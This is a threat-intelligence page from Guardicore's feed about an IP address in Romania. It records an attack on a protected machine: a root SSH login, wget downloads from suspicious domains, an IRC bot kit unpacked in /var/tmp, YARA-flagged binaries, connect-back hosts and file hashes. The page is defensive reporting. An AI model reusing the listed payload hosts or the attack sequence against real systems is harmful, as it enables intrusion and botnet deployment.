IP Address: 109.166.131.147Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
109.166.131.147​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

SSH

Tags

HTTP DNS Query Networking Operation Human Download and Allow Execution Superuser Operation Download File Download Operation Access Suspicious Domain Bulk Files Tampering Malicious File 26 Shell Commands Download and Execute Package Install SSH Successful SSH Login Outgoing Connection Read Password Secrets

Connect Back Servers

netrix-emea.net _http._tcp.archive.ubuntu.com www.speedtest.net canonical.com stosat-rstn-01.sys.comcast.net shentel.net sp1.winchesterwireless.net stosat-malt-01.sys.comcast.net www.saminicu.ml edinburg.speedtest.shentel.net bigdaddy.wave2net.com blazingfast.io archive.ubuntu.com transfer.sh saminicunr1.000webhostapp.com comcast.net nasapaul.com

69.241.0.94 185.216.24.82 145.14.145.143 204.111.5.18 151.101.2.219 145.14.145.134 69.241.87.90 178.62.44.163 91.189.88.149 145.14.145.43 184.170.114.134 204.111.21.7 145.14.144.155 145.14.145.149 185.61.137.36

Basic Information

IP Address

109.166.131.147

Domain

-

ISP

Orange Romania

Country

Romania

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-07-22

Last seen in Guardicore Centra

2018-07-23

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using SSH with the following credentials: root / **** - Authentication policy: White List

Successful SSH Login

A possibly malicious Superuser Operation was detected

Download Operation Package Install Superuser Operation Networking Operation

A possibly malicious Download Operation was detected 2 times

Download Operation Package Install Superuser Operation Networking Operation

Process /usr/bin/wget attempted to access suspicious domains: www.saminicu.ml

DNS Query Access Suspicious Domain Outgoing Connection

Process /usr/bin/wget generated outgoing network traffic to: 145.14.145.143:80

Outgoing Connection

/var/tmp/ntest.py was downloaded

Download File

Process /usr/bin/python2.7 attempted to access domains: stosat-rstn-01.sys.comcast.net, www.speedtest.net, stosat-malt-01.sys.comcast.net and edinburg.speedtest.shentel.net

DNS Query

Process /usr/bin/python2.7 generated outgoing network traffic to: 151.101.2.219:80, 69.241.87.90:80, 204.111.21.7:80, 184.170.114.134:80, shentel.net:80 and comcast.net:80

Outgoing Connection

Process /usr/bin/python2.7 attempted to access suspicious domains: sp1.winchesterwireless.net and bigdaddy.wave2net.com

DNS Query Access Suspicious Domain Outgoing Connection

A possibly malicious Package Install was detected 3 times

Download Operation Package Install Superuser Operation Networking Operation

Process /usr/bin/wget attempted to access suspicious domains: nasapaul.com

DNS Query Access Suspicious Domain Outgoing Connection

Process /usr/bin/wget generated outgoing network traffic to: 185.61.137.36:80

Outgoing Connection

/var/tmp/IRC.zip was downloaded

Download File

The file /var/tmp/IRC/Changes was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Changes.old was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Changes.older was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Config was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Donation was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/INSTALL.REMOTEINC was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/LICENSE was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Makefile.in was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/README was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Unreal.nfo was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/autogen.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/badwords.channel.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/badwords.message.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/badwords.quit.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/config.guess was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/config.sub was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/configure was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/configure.ac was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/createchangelog was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/curl-ca-bundle.crt was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/curlinstall was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/dccallow.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/help.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/m_template.c was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/makefile.win32 was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/modulize was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/newnet was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/spamfilter.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/unreal.in was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/unrealircd.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/update was downloaded and granted execution privileges

Download and Allow Execution

Process /usr/lib/apt/methods/http attempted to access domains: _http._tcp.archive.ubuntu.com and archive.ubuntu.com

DNS Query

Process /usr/lib/apt/methods/http generated outgoing network traffic to: 91.189.88.149:80

Outgoing Connection

The file /usr/share/doc/nano was downloaded and granted execution privileges

Download and Allow Execution

The file /usr/share/doc/nano/examples was downloaded and granted execution privileges

Download and Allow Execution

The file /usr/share/nano was downloaded and granted execution privileges

Download and Allow Execution

The file /bin/nano was downloaded and executed 2 times

Download and Execute

A possibly malicious Networking Operation was detected

Download Operation Package Install Superuser Operation Networking Operation

The file /var/tmp/IRC/a.out was downloaded and granted execution privileges

Download and Allow Execution

/tmp/cczUwXYz.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/var/tmp/IRC/a.out was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /var/tmp/IRC/conftest was downloaded and granted execution privileges 2 times

Download and Allow Execution

/tmp/cc02QyAA.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/var/tmp/IRC/conftest was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/tmp/ccK1yhjM.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/var/tmp/IRC/conftest.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

Connection was closed due to timeout

Process /usr/bin/unzip performed bulk changes in {/var} on 352 files

Bulk Files Tampering

Process /usr/bin/dpkg performed bulk changes in {/} on 141 files

Bulk Files Tampering

Associated Files

/var/tmp/IRC/conftest

SHA256: c3a79017107d26dab919768b08cd13cc1a74d9163d1809b1ac242f4089ed6914

8560 bytes

/var/tmp/ntest.py

SHA256: f0348ce829a1593d34d9db1f73cd0907128e8f39e697bdaf043079f0f5bbc994

24827 bytes

/var/tmp/IRC/conftest

SHA256: 25788521e0690039f7b77d584474ab4ef4a9234e225d1140465e3ade90de7e94

9616 bytes

/root/boty.php

SHA256: 7014492aafecd662abfa85668bbdb7402a52d40e849d04a28263037e830d6ed2

8712 bytes

/root/boty.txt

SHA256: 2cb7452a5d13797a8013092f4910a15d339adbd8d810fdedf6e2b9bbc83cb390

38097 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 109.166.131.147​Previously Malicious